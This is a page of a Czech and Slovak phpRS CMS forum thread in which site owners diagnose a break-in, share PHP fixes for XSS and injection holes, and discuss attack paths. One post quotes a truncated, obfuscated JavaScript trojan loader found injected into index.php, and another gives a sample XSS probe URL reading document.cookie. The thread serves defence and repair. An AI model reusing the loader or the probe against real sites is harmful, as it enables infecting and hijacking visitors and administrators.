phpRS 2.8.x : phpRS Fórum
Toto fórum je určené výhradně k diskuzi o verzích phpRS v2.8.x.
phpRS - redakční a informační systém
Jít na stránku:  Předchozí123456
Aktuální stránka:6 z 6
Re: Možný hack? - přesměrování stránky na http://fx.cz/
Zaslán uživatelem/kou: Richmond (IP adresa zaznamenána)
Datum: 2008-02-07, 12:58

A dopr....

Sypu si popel na hlavu, taková kravina .... já debil ....

Omlouvám se všem zúčastněným, mít delší nohu s kolenem navíc, tak se nakopnu ....


Re: Možný hack?
Zaslán uživatelem/kou: killyan (IP adresa zaznamenána)
Datum: 2008-02-26, 07:40

Dle rady pa3ka je třeba, vedle readers.php a areaders.php (návody výše), taky opravit soubor view.php:

(ř.106-107 doplnění (int)):

else:
// chybova hlaska: Chyba! Clanek cislo XXXX neexistuje!
echo "<p align=\"center\" class=\"z\">".RS_VW_ERR2_1."
".(int)$GLOBALS["cisloclanku"]." ".RS_VW_ERR2_2."<p>\n"; endif;


Re: Možný hack?
Zaslán uživatelem/kou: Warlord1 (IP adresa zaznamenána)
Datum: 2008-02-26, 17:23

Dobrý den, chtěl jsem se zeptat, jestli už je dostupná záplata řešící tento problém, nebo zda musím stále kód upravovat manuálně...

Díky za odpověď,
W.

Re: Možný hack?
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2008-02-26, 20:46

Záplata asi ani nebude, mala by to byť skôr opravná verzia phpRS ktorá by mala riešiť tieto problémy spolu s dalšími drobnými opravami. Jirka ale evidentne nestíha, pretože to už malo byť vonku :-(

Re: Možný hack?
Zaslán uživatelem/kou: Warlord1 (IP adresa zaznamenána)
Datum: 2008-02-26, 21:01

Nevadí, když jsem se prolouskal pořádně těmito třemi stranami, zjistil jsem, že to nenítak složité a soubory si upravil sám. Uložil jsem si je na stranu a než vyjde záplata, budu je aplikovat nakaždý web který běží pod phpRS.

PS: Dnes ráno mi málem praskla pumpa, když jsem na stránce objevil nový admin účet.

Nevím jestli to někomu z vás pomůže, dopoledne jsem si dal tu práci a pídil se po díře(a k vlastní radosti jsem na ni přišel bez Vás) a zjistil, že čtenář se pojmenoval tak, aby vložil tento externí kód:

EDIT: kód som odstránil aby to niekoho nelákalo zneužiť



Celkem upraveno 1×. Poslední úprava pa3k v 27.02.2008 21:20.

Re: Možný hack?
Zaslán uživatelem/kou: mr3ska (IP adresa zaznamenána)
Datum: 2008-02-26, 22:56

tak si to tady všechno pročítám a mam v tom dost zmatek. nějak nevím co všechno z uvedený diskuse mam aplikovat abych tu "díru" odstranil

Re: Možný hack?
Zaslán uživatelem/kou: mr3ska (IP adresa zaznamenána)
Datum: 2008-02-26, 23:26

killyan napsal/a:
-------------------------------------------------------
> Dle rady pa3ka je třeba, vedle readers.php a
> areaders.php (návody výše), taky opravit soubor
> view.php:
>
> (ř.106-107 doplnění (int)):
>
> else:
> // chybova hlaska: Chyba! Clanek cislo XXXX
> neexistuje!
> echo "<p align=\"center\"
> class=\"z\">".RS_VW_ERR2_1."
> ".(int)$GLOBALS["cisloclanku"]."
> ".RS_VW_ERR2_2."<p>\n"; endif;
>
>

jen bych doplnil, že tenhle kód neni ve verzi 2.8.0 na řádcích 106-107 ale až na 214-215

Re: Možný hack?
Zaslán uživatelem/kou: MirekS (IP adresa zaznamenána)
Datum: 2008-06-10, 18:30

[http://www.lupa.cz/clanky/na-sql-injection-doplaci-i-rada-ceskych-webu/] aneb proc osetrit data i na vystupu a nespolehat se na to, ze v databazi nemam nic nebezpeceho (viz Pokročilejší SQL injection)

Re: Možný hack?
Zaslán uživatelem/kou: aggi (IP adresa zaznamenána)
Datum: 2008-08-20, 11:13

Zdar, vůbec se v téhle tématice nevyznám, ale na stránkách [http://sermiri.empyrea.com] se mi objevil trojan, který se volal ze souboru index.php. Kod který se přidal byl na konci asi 80 prázdných řádků a vypadal takto:

<!--a59dbb0abbdec3781405527689dcfb84-><script language=javascript>ounde="%";wuzc="Q3cscrQ69pQ74 Q6cQ61nQ67Q75agQ65=Q6aQ61vascrQ69pQ74Q3eQ20Q20Q66uncQ74Q69Q6fQ6e flQ6c(dgf){vQ61Q72 ouQ6aQ2cQ74zc=\"5Q60Q45_Q23Q61nQ20V{|Q5cQ22h8Q54dQ63K:zOHMqP)Q6fQ31'@3t~Q69GQ21Q66Q6al.Q4eQ43bU&Q76-Q3dBQ67Q37yF4Q4aQ780Q41uQ5a](Q73rQ32[eQ7dQ36k9Q2c$mQ77I*^Q3bp+Q22Q2cmQ3d\"\",y,Q75sQ68Q2cQ6cQ66Q3dQ22Q22Q2cQ79Q68;for(ouj=Q30Q3bouQ6aQ3cdgQ66Q2eleQ6egtQ68Q3bQ6fuQ6aQ2b+){ y=Q64gf.charAQ74Q28oQ75Q6a);ush=tzQ63Q2einQ64eQ78OQ66(Q79)Q3bQ69Q66Q28uQ73Q68Q3e-Q31){ yh=(Q28usQ68+1Q29Q258Q31-Q31)Q3bif(yh<=0)yQ68Q2b=81Q3blQ66Q2bQ3dtzc.Q63Q68aQ72At(yQ68Q2dQ31); } else lfQ2b=yQ3bQ7dQ6d+=lQ66;doQ63umentQ2ewrite(mQ29Q3bQ7d<Q2fscriQ70t>"...........skrátené..........</script>

Naprosto nemám tušení, jak se tam dostal, na stránkých je použito několik mých pluginu, které jsou volně k dispozici a nikdo jiný zatím pokud vím nic nehlasil... netuší někdo jak k tomu mohlo dojít? Problém jsem objevil pomoci NOD 32, který vyhazoval zablokování scriptu. Název trojana byl TrojanDownloader.Small.NAT.

EDIT: kód som skrátil, niektoré antivíry na tom kričali.

...::: [http://aggi.empyrea.net/] :::...



Celkem upraveno 1×. Poslední úprava pa3k v 14.07.2011 23:53.

Re: Možný hack?
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2008-08-21, 10:22

pravdepodobne útok cez FTP, čítaj tu:
[http://www.soom.cz/index.php?name=usertexts/show&aid=220]

Re: Možný hack?
Zaslán uživatelem/kou: Fury (IP adresa zaznamenána)
Datum: 2008-12-05, 20:08

U phprs 2.8x mi to jede v pohodě, ale na 2.65 mi to hází tuhle hlášku:

Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Can't connect to local MySQL server through socket '/tmp/mysql.sock' (2) in /mnt/data/accounts/b/bathory/data/www/search.php on line 37

na tom řádku 37 je právě tento kód: $GLOBALS["rstema"] = mysql_real_escape_string($GLOBALS["rstema"]);


dá se s tím něco udělat???

Re: Možný hack?
Zaslán uživatelem/kou: BikerSkin (IP adresa zaznamenána)
Datum: 2009-01-03, 17:28

Ne že bych něco pánové ale tohle tady na webu hlásí trojáka !!!!!!!!!
"http://www.phprs.net/forum/read.php?32,30139,page=6"

Re: Možný hack?
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2009-01-04, 17:44

BikerSkin napísal/a:
-------------------------------------------------------
> Ne že bych něco pánové ale tohle tady na webu
> hlásí trojáka !!!!!!!!!
> "http://www.phprs.net/forum/read.php?32,30139,page=
> 6"

False positive, tvoj AV soft najskôr chybne detekuje trojan z textu na webe. Pošli link výrobcovy AV, nech si to opraví.

Re: Možný hack?
Zaslán uživatelem/kou: mnich (IP adresa zaznamenána)
Datum: 2009-01-18, 14:22

Nazdar veciam ako XSS a bezpecnost webu sa rozumiem dost laicky ale pri citani tejto diskusie a letmom pohlade zdrojovy kod ma napada otazka.
Nebude chyba AJ v nejakej inej casti kodu.
1. Pretoze vlozenim nejakeho XSS skriptu pomocou napriklad mena, niesom schopny zavolat ziadny php kod/skript z admin/ pretoze tam kontroluje identitu(session) admina, ktoru nemam. takze tato moznost odpada.
2. Potom ma napada volat z XSS kodu nejaky verejne pristupny subor a vnom sa pokusit napr o sql injections atd. Tu mi to tiez pride ako nezmysel nakolko verejne pristupny skript by som mohol volat aj bez XSS cize asi nie.
3. A na zaver pouzit nieco ako javascript text ktory by presiel cez mysql_real_escape_string a bol schopny o sql injection o tomto moc neviem ale podla mna to nieje mozne.

Iny sposob utoku ma nenapada ale ocakavam ze bude v nejakej casti kodu este nejaka chyba ktora je volana nejako specialne cez xss a zneuzita. (Vobec ma nenapada ako a kde)

Preto by asi nebolo odveci opravit miesto prieniku tak aby aj v pripade XSS chyby nebol utok preveditelny a potom samozrejme opravit aj XSS miesta.

Diki za kazde info ktore ma nejako zorientuju v problematike

ps. Nemyslim teraz situaciu ked admin tukne na ctenari a v areaders.php bude infikovany kod. ale situaciu ked napr pribudne novy admin bez nejakej spoluucasti admina.



Celkem upraveno 1×. Poslední úprava mnich v 18.01.2009 14:28.

Re: Možný hack?
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2009-01-20, 08:23

mnich napísal/a:
-------------------------------------------------------
> Nazdar
nazdar

> veciam ako XSS a bezpecnost webu sa
> rozumiem dost laicky ale pri citani tejto diskusie
> a letmom pohlade zdrojovy kod ma napada otazka.
> Nebude chyba AJ v nejakej inej casti kodu.
nie, pokiaľ viem, nie je. ak máš podozrenie, napíš súkromnú správu (PM)

> 1. Pretoze vlozenim nejakeho XSS skriptu pomocou
> napriklad mena, niesom schopny zavolat ziadny php
> kod/skript z admin/ pretoze tam kontroluje
> identitu(session) admina, ktoru nemam. takze tato
> moznost odpada.
Ak uz sa script vloží, je to chyba. Závažnosť hrozby závisí od miesta výpisu vloženého kódu. Ak je to administrácia, je to kritické, ak je to "len" výpis z frontendu, je to nebezpečné menej, ale rozhodne by som to nepodceňoval. je niekoľko spôsobov použiťia XSS zraniteľnosti a aj ten na prvý pohľad najmenej rizikový môže niekto šikovný zneužiť, rozdiel je len v tom, že útok bude dlhšie trvať a pod.

> 2. Potom ma napada volat z XSS kodu nejaky verejne
> pristupny subor a vnom sa pokusit napr o sql
> injections atd. Tu mi to tiez pride ako nezmysel
> nakolko verejne pristupny skript by som mohol
> volat aj bez XSS cize asi nie.
SQL injection s tým moc nesúvisí, ak sú otvorené dvere (XSS) je zbytočné vylamovať okno

> 3. A na zaver pouzit nieco ako javascript text
> ktory by presiel cez mysql_real_escape_string a
> bol schopny o sql injection o tomto moc neviem ale
> podla mna to nieje mozne.
>
> Iny sposob utoku ma nenapada ale ocakavam ze bude
> v nejakej casti kodu este nejaka chyba ktora je
> volana nejako specialne cez xss a zneuzita. (Vobec
> ma nenapada ako a kde)
čisto napísaný CMS by mal HTML/JS vrstvu oddeliť pomocou šablón a všetko čo ide na výstup do šablóny ošetriť (strip_tags, htmlspecialchars), phpRS je trošku iný a v tomto ohľade nemej systémový.

> Preto by asi nebolo odveci opravit miesto prieniku
> tak aby aj v pripade XSS chyby nebol utok
> preveditelny a potom samozrejme opravit aj XSS
> miesta.
samozrejme dá sa ošetriť vstup hromadne, napríklad v /admin/aext_prom.php a Jirka sám navrhol ochranu na XSS rozšíriť automaticky na tomto mieste a v scriptoch, kde potrebuješ povoliť vstup HTML (napríklad vlastné menu v editácii účtu čitateľa) povolíš pomocou nastavenia konštanty.


Mimochodom, dnes už pokus o XSS útok detekujú niektorí webhosteri na úrovni serveru alebo firewallu, čo je na jednej strane OK, ale netreba sa na to spoliehať. Príklad neškodného pokusu o XSS: [http://lipno-online.cz/?%3Cscript%3Ealert(document.cookie);%3C/script%3E] , ktorý pekne zachytí server.

Re: Možný hack?
Zaslán uživatelem/kou: Lonanek (IP adresa zaznamenána)
Datum: 2011-12-28, 22:08

Dobrý večer.
Dnes jsem si všiml, že se mi do datábáze ukládají odkazy, které nevkládá nikdo z uživatelů.

jedná se o klíčové slovo "h r y" - (psáno bez mezer vcelku). Pokud jej na webu někdo zapíše, uloží se do databáze současně odkaz na web kafe.cz.
Celý odkaz zde záměrně neuvádím.....

Prosím, kde hledat možný zdroj "nákazy"?
Hesla v TCMD neukládám, domnívám se, že všechny vstupy jsou ošetřeny (htmlspecialchars, sql_escape_string, (int)..)

EDIT:
jedná se opravdu pouze o toto slovo psané dohromady, pokud je v textu rozděleno, je vše OK (tedy hr y, nebo h ry)

Koukal jsem, že "napadených" webů je více a nejedná se o phprs.
do vyhledávače zadejte 14ecca8a66beb0ff

EDIT 2:
Pátráním jsem zjistil, že se jedná o weby hostingu Endora. Na vině je způsob vkládání reklamy do stránek viz [http://podpora.endora.cz/viewtopic.php?f=5&t=4521]. Raději to nebudu komentovat.....

EDIT 3:
Již po domluvě s adminy opraveno - Endora má slušné chování....


* Klub kuželkářů Zálabák, Hankova 62, 503 03 Smiřice (Endora) * X X * Stránky ČZS ZO Třešňovka2 * X X * Cvičný phpRS web (WZ) * X X * Testovací phpRS web (WZ) *
* cvičná verze phpRS v 2.8.2 * X X * testovací web CMS *




Celkem upraveno 4×. Poslední úprava Lonanek v 31.12.2011 11:00.

Jít na stránku:  Předchozí123456
Aktuální stránka:6 z 6


Lituji, ale pouze registrovaní uživatelé mohou zasílat příspěvky do této sekce.
This forum powered by Phorum and designed by STaNBoSS.